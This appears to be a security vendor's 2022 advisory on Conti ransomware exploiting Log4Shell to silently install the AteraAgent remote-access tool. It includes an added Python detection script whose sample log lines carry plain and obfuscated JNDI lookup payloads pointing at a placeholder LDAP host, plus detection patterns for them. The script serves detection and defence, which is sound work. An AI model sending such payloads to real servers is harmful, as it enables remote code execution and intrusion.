SpearTip | March 2nd, 2022

Based on SpearTip threat intelligence gathered through our 24/7 Incident Response practice, we have observed Conti ransomware operators in partner environments attempting to exploit the Log4j vulnerability (Log4Shell, CVE-2021-44228).

In the past, Conti operators have targeted a range of industries, including healthcare, critical infrastructure, manufacturing, and enterprise-level businesses. Conti has recently become entangled in the conflict between Russia and Ukraine, and operators from both countries are using cyberattacks to disrupt one another's operations.

Conti’s observed attack vectors include exposed RDP services and exploitation of the “PrintNightmare” and “Zerologon” vulnerabilities to infiltrate networks.

Conti has also used phishing emails carrying malicious links and attachments such as Excel files. The Excel file contains a malicious payload; when the user opens the document, it downloads the BazarBackdoor malware, which connects the victim’s device to Conti’s command-and-control server. Once on the compromised machine, the operators exfiltrate and encrypt data and apply the “double extortion” scheme, threatening to leak the stolen data if the ransom is not paid.

The ransomware loads an encrypted DLL into memory, decrypts it, and runs the encryption routine, which also spreads to other hosts on the network. Before that stage, the operators gain access through unprotected RDP ports, phishing emails that give them remote access via an employee’s computer, malicious attachments or downloads, and exploitation of unpatched application vulnerabilities.

Attack Method

In this instance, Conti threat actors are attempting to exploit the Log4j vulnerability to download an MSI installer named setup.msi and execute it quietly in the background. The installer then attempts to install AteraAgent, a legitimate remote monitoring and management (RMM) tool, which would give the attackers persistent remote access to the endpoint. VMware products are being particularly targeted by this technique.
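As an added detection example (not SpearTip's code, and not derived from their telemetry), the following Python checks both ends of the chain described above: it normalizes the common obfuscations of a Log4Shell JNDI lookup in web access logs, and it flags a quiet msiexec install of setup.msi spawned by a Java process, followed by AteraAgent starting. The log lines, process events, file paths and the 203.0.113.10 address are constructed for illustration.

```python
"""Detection helpers for the chain described above: a Log4Shell (JNDI lookup)
request against a Java service, followed by a quiet msiexec install of
setup.msi and the start of the AteraAgent RMM tool.

Added example, not SpearTip's code or telemetry. The access-log lines and
process events below are constructed for illustration; 203.0.113.10 is a
documentation-range address and every file path is hypothetical.
"""
import re
from urllib.parse import unquote

# Log4Shell payloads are often obfuscated with nested lookups so the literal
# string "jndi" never appears, e.g. ${${lower:j}ndi:...} or ${${::-j}${::-n}di:...}.
# Two rewrites undo the common tricks, applied repeatedly until stable:
#   ${lower:X} / ${upper:X} -> X   (case lookup applied to a literal)
#   ${anything:-X}          -> X   (default value of an empty or unknown lookup)
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookup(text: str, max_rounds: int = 10) -> str:
    """URL-decode, then collapse nested Log4j lookups until nothing changes."""
    text = unquote(text)
    for _ in range(max_rounds):
        collapsed = _DEFAULT_VALUE.sub(r"\1", _CASE_LOOKUP.sub(r"\1", text))
        if collapsed == text:
            break
        text = collapsed
    return text


def find_log4shell(lines):
    """Return (index, normalized_line) for each line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize_lookup(line)
        if _JNDI.search(norm):
            hits.append((i, norm))
    return hits


# Constructed web-server access log: one benign request, then three JNDI
# probes (plain, URL-encoded with a lower: lookup, and ::- default-value tricks).
LOG_LINES = [
    '10.0.0.5 - - [02/Mar/2022:10:12:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [02/Mar/2022:10:12:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [02/Mar/2022:10:12:09 +0000] "GET /portal/?q=%24%7B%24%7Blower%3Aj%7Dndi'
    '%3Aldap%3A%2F%2F203.0.113.10%3A1389%2Fb%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    '10.0.0.9 - - [02/Mar/2022:10:12:11 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.10:1389/c}"',
]

# Endpoint side: a Java web service has no business spawning msiexec, and a
# quiet (/qn, /quiet, ...) install of a file called setup.msi matches the
# observed drop. AteraAgent itself is a legitimate RMM agent, so treat its
# appearance as a finding only where Atera is not deployed.
_JAVA_PARENT = re.compile(r"(?:^|\\)(?:java|javaw|tomcat\d*)\.exe$", re.IGNORECASE)
_QUIET_FLAG = re.compile(r"(?:^|\s)/(?:q[nbr]?|quiet|passive)(?=\s|$)", re.IGNORECASE)


def find_msi_chain(events):
    """Return flagged process-creation events, each with a list of reasons."""
    flagged = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        reasons = []
        if image == "msiexec.exe":
            if _JAVA_PARENT.search(ev["parent"]):
                reasons.append("msiexec spawned by a Java process")
            if _QUIET_FLAG.search(ev["cmdline"]) and "setup.msi" in ev["cmdline"].lower():
                reasons.append("quiet install of setup.msi")
        elif image == "ateraagent.exe":
            reasons.append("AteraAgent started")
        if reasons:
            flagged.append({**ev, "reasons": reasons})
    return flagged


# Constructed Sysmon-style process-creation events (hypothetical paths).
PROCESS_EVENTS = [
    {"host": "web01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\jdoe\Downloads\editor.msi"'},
    {"host": "web01", "parent": r"C:\Program Files\Java\jre\bin\java.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Windows\Temp\setup.msi /qn"},
    {"host": "web01", "parent": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Program Files\AteraAgent\AteraAgent.exe",
     "cmdline": r'"C:\Program Files\AteraAgent\AteraAgent.exe"'},
    {"host": "app02", "parent": r"C:\Windows\CCM\CcmExec.exe",  # SCCM: quiet but legitimate
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Windows\ccmcache\1a\app.msi" /qn'},
]

if __name__ == "__main__":
    for i, norm in find_log4shell(LOG_LINES):
        print(f"log line {i}: JNDI lookup -> {norm}")
    for ev in find_msi_chain(PROCESS_EVENTS):
        print(f"{ev['host']}: {ev['image']} -> {', '.join(ev['reasons'])}")
```

The Java-parent check is the strongest of the three signals, since a quiet msiexec install on its own is routine for software deployment tools (the SCCM event above is deliberately left unflagged). Where Atera is used legitimately, drop the AteraAgent rule or scope it to hosts that should not carry an RMM agent.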

ShadowSpear blocks this attack on execution, and the SOC is responding to these threats in real time. We expect these attacks to be relatively widespread. SpearTip will provide more updates as they become available.

SpearTip’s ShadowSpear platform defends your environment with unparalleled resources preventing cybersecurity threats and attacks from affecting your business. ShadowSpear integrates with cloud, network and endpoint devices providing security. ShadowSpear prevents ransomware from exploiting memory, stopping the threat before the full attack cycle. The ShadowSpear Platform is backed by the engineers in our 24/7 Security Operations Center, ready to assist partners with security issues immediately.

If you or your partners have any questions or concerns surrounding the Conti ransomware group or log4j, please email [email protected] or call our breach response number at 833.997.7327.